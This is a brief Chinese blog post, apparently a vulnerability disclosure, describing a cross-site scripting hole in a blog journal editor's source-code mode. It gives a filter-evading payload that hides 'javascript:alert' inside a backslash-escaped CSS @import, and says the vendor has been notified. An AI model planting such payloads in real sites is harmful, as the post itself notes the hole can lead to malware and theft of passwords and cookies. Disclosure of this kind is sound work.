作者:茄子宝来源:茄子乱语
直接用日志显示源代码方式编辑写入
XSS
<P><STRONG>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
</STRONG></P>此处脚本漏洞存在有一定的风险,可能导致挂马,威胁到用户,密码,COOKIE等敏感信息,已通知官方处理等待更新程序.
